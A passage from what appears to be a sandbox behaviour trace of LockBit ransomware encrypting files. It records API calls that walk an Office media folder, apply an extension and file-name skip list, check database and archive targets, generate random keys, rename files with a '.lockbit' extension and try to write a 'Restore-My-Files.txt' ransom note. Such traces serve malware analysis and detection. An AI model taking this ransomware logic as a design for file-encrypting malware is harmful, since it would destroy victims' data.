pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.894] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.898] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.898] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.898] free (_Block=0x1fa2ed8) [0203.898] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.898] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.898] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x319bbb00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x319bbb00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0xaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15059_.GIF", cAlternateFileName="")) returned 1 [0203.899] lstrcmpiW (lpString1=".", lpString2="BD15059_.GIF") returned -1 [0203.899] lstrcmpiW (lpString1="..", lpString2="BD15059_.GIF") returned -1 [0203.899] PathFindExtensionW (pszPath="BD15059_.GIF") returned=".GIF" [0203.899] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.899] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.899] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.900] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.900] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.900] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15059_.GIF") returned 1 [0203.900] lstrcmpiW (lpString1="ntldr", lpString2="BD15059_.GIF") returned 1 [0203.900] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15059_.GIF") returned 1 [0203.900] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15059_.GIF") returned 1 [0203.900] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15059_.GIF") returned -1 [0203.900] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15059_.GIF") returned 1 [0203.900] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15059_.GIF") returned 1 [0203.900] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.900] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF") returned=".GIF" [0203.900] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.900] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.900] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.901] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.901] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.901] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF.lockbit") returned 78 [0203.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15059_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.902] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.902] malloc (_Size=0x40068) returned 0x3df0008 [0203.903] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=170) returned 1 [0203.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.903] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.906] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.907] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.907] free (_Block=0x1fa2ed8) [0203.907] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.907] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.907] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x306a8e00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x306a8e00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x78, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15060_.GIF", cAlternateFileName="")) returned 1 [0203.907] lstrcmpiW (lpString1=".", lpString2="BD15060_.GIF") returned -1 [0203.907] lstrcmpiW (lpString1="..", lpString2="BD15060_.GIF") returned -1 [0203.907] PathFindExtensionW (pszPath="BD15060_.GIF") returned=".GIF" [0203.907] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.907] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.907] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.908] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.908] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.908] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.908] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.908] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.908] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15060_.GIF") returned 1 [0203.908] lstrcmpiW (lpString1="ntldr", lpString2="BD15060_.GIF") returned 1 [0203.908] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15060_.GIF") returned 1 [0203.908] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15060_.GIF") returned 1 [0203.908] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15060_.GIF") returned -1 [0203.908] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15060_.GIF") returned 1 [0203.908] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15060_.GIF") returned 1 [0203.908] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.909] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF") returned=".GIF" [0203.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.909] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.909] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.910] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF.lockbit") returned 78 [0203.910] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15060_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.912] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.912] malloc (_Size=0x40068) returned 0x3df0008 [0203.912] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=120) returned 1 [0203.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.913] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.916] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.916] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.917] free (_Block=0x1fa2ed8) [0203.917] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.917] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.917] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.917] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f396100, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2f396100, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x77, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15061_.GIF", cAlternateFileName="")) returned 1 [0203.917] lstrcmpiW (lpString1=".", lpString2="BD15061_.GIF") returned -1 [0203.917] lstrcmpiW (lpString1="..", lpString2="BD15061_.GIF") returned -1 [0203.917] PathFindExtensionW (pszPath="BD15061_.GIF") returned=".GIF" [0203.917] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.917] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.917] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.918] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.918] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.918] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.918] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW 